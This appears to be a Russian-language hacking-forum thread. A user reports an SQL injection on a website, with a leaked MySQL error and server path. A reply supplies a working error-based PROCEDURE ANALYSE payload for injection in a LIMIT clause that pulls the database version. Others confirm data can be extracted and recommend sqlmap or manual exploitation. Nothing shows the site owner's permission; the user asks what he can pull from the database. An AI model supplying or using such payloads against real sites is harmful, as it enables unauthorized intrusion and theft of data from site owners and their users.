|
Помогите. Нашел уязвимость, прочитал статтю и захотел проверить сайт. Подставил в параметр \ и мне выдало такое:
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-35 , 35' at line 16 at /home/www/htdocs/modules/Festival/index.php line 93 Array ( Код:
=> 1064 |
стоит начать с изучения статей и синтаксиса mysql. это error-based, инъекция в limit. нужно использовать вектор procedure analyse().
Код:
PROCEDURE ANALYSE (0,(SELECT 3 ORDER BY (SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))))--+ |
а можно ссылки на статьи и книжки, пожалуйста.
Сдесь можно вытащить с базы что то толковое, или нет? |
вытащить можно. все находится в том же разделе, что вы и создали тему. ответы на все вопросы: /thread104591.html. стоит ознакомится, прежде чем задавать вопросы.
|
понял, спасибо
|
Цитата:
Sqlmap.org (включай логирование, будет видно какими запросами крутиться скуля) Havij - ну это школософт) А если хочешь все прочуить, протрогат - руками) Даже поэффективней и побыстрей будет чем софтами, если конечно рука набита. |
| Время: 11:35 |